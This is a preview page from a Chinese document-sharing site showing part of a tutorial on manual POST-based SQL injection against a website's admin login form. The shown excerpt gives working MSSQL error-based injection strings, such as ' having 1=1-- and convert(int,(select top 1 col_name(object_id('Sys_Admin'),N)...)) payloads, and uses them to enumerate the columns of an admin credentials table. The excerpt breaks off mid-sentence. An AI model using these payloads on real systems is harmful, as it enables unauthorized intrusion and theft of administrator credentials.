下载此文档

后台登陆框post注入实战.docx


文档分类:IT计算机 | 页数:约3页 举报非法文档有奖
1/3
下载提示
  • 1.该资料是网友上传的,本站提供全文预览,预览什么样,下载就什么样。
  • 2.下载该文档所得收入归上传者、原创者。
  • 3.下载的文档,不会出现我们的网址水印。
1/3 下载此文档
文档列表 文档介绍
后台登陆框 post 注入实战后台登陆框 post 注入按照注入的方式属于 post ,和前台搜索型 post 注入、文本框注入类似,由于目前主流的注入工具除了穿山甲等较新工具以外几乎都是 get 注入,尤其是对于这种后台账户型 pos t 注入式无能为力的,所以手工注入就显得尤为重要了,今天就用实战说明一下大家不大在意的 pos t 注入的手注方法。(以后也会补充一个 cookie 注入的实战例子) / 1. 爆数据库的表段和相关字段' having 1=1-- 说明有表名叫 Sys_Admin 字段有 password Sys_Admin 下的其他字段。' group by having 1=1-- 不知道为何没法用这种方式继续爆表段的其他字段失败。 3 换种方式爆 Sys_Admin 表段的其他字段 1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),1) from Sys_Admin)) and '1'='1 1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),2) from Sys_Admin)) and '1'='1 这就是我们一开始就和表段一起爆出来的密码字段。 1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),3) from Sys_Admin)) and '1'='1 在将 nvarchar 值'Name' 转换成数据类型 int 时失败。由结果可以推断

后台登陆框post注入实战 来自淘豆网www.taodocs.com转载请标明出处.

非法内容举报中心
文档信息
  • 页数3
  • 收藏数0 收藏
  • 顶次数0
  • 上传人jianjian401
  • 文件大小182 KB
  • 时间2017-02-27
最近更新